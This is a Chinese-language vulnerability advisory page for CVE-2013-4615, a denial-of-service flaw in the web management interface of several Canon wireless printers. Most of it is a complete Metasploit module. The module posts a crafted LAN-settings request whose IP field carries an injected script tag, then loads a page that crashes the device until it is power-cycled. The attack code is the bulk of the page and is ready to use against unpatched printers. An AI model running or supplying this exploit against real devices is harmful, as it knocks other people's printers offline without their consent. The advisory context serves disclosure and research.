多款Canon打印机远程拒绝服务漏洞（CVE-2013-4615）

发布日期：2013-06-18
更新日期：2013-06-21受影响系统：
Canon Printers
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 60598
CVE（CAN） ID: CVE-2013-4615

Canon是日本著名的佳能打印机制造商。

Canon多款无线打印机的模块HTTP管理界面处理特制的HTTP请求时存在拒绝服务漏洞，可导致设备拒绝服务。

<*来源：Matt Andreko

链接：http://packetstormsecurity.com/files/122073/canon-passworddisclosedos.txt
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require "msf/core"
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Dos
+
+ def initialize（info = {}）
+ super（update_info（info,
+ "Name" => "Canon Wireless Printer Denial Of Service",
+ "Description" => %q{
+ The HTTP management interface on several models of Canon Wireless printers
+ allows for a Denial of Service condition via a crafted HTTP request. This
+ requires the device to be turned off and back on again to restore use.
+ },
+ "License" => MSF_LICENSE,
+ "Author" =>
+ [
+ "Matt "hostess" Andreko <mandreko[at]accuvant.com>"
+ ],
+ "References" => [
+ [ "CVE", "2013-4615" ],
+ [ "URL", "http://www.mattandreko.com/2013/06/canon-y-u-no-security.html"]
+ ],
+ "DisclosureDate" => "June 18 2013"））
+ register_options（[
+ Opt::RPORT（80）,
+ ]）
+ end
+
+ def run
+
+ begin
+
+ # The first request will set the new IP
+ res = send_request_cgi（{
+ "method" => "POST",
+ "uri" => "/English/pages_MacUS/cgi_lan.cgi",
+ "data" => "OK.x=61" +
+ "&OK.y=12" +
+ "&LAN_OPT1=2" +
+ "&LAN_TXT1=Wireless" +
+ "&LAN_OPT3=1" +
+ "&LAN_TXT21=192" +
+ "&LAN_TXT22=168" +
+ "&LAN_TXT23=1" +
+ "&LAN_TXT24=114"><script>alert（"xss"）;</script>" +
+ "&LAN_TXT31=255" +
+ "&LAN_TXT32=255" +
+ "&LAN_TXT33=255" +
+ "&LAN_TXT34=0" +
+ "&LAN_TXT41=192" +
+ "&LAN_TXT42=168" +
+ "&LAN_TXT43=1" +
+ "&LAN_TXT44=1" +
+ "&LAN_OPT2=4" +
+ "&LAN_OPT4=1" +
+ "&LAN_HID1=1"
+ }）
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+ print_error（"Couldn"t connect to #{rhost}:#{rport}"）
+ return
+ end
+
+ # The second request will load the network options page, which seems to trigger the DoS
+ send_request_cgi（{
+ "method" => "GET",
+ "uri" => "/English/pages_MacUS/lan_set_content.html"
+ }） #default timeout, we don"t care about the response
+ print_status（"DoS payload sent to #{rhost}:#{rport}. Check the device for responsiveness."）
+
+ end
+end建议：
--------------------------------------------------------------------------------
厂商补丁：

Canon
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.canon.com/HAProxy 负出现次数拒绝服务漏洞（CVE-2013-2175）Google Android "/data/local.prop"文件本地权限提升漏洞相关资讯 Canon安全漏洞

多款Canon打印机远程信息泄露漏洞（（06/20/2013 05:58:54）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款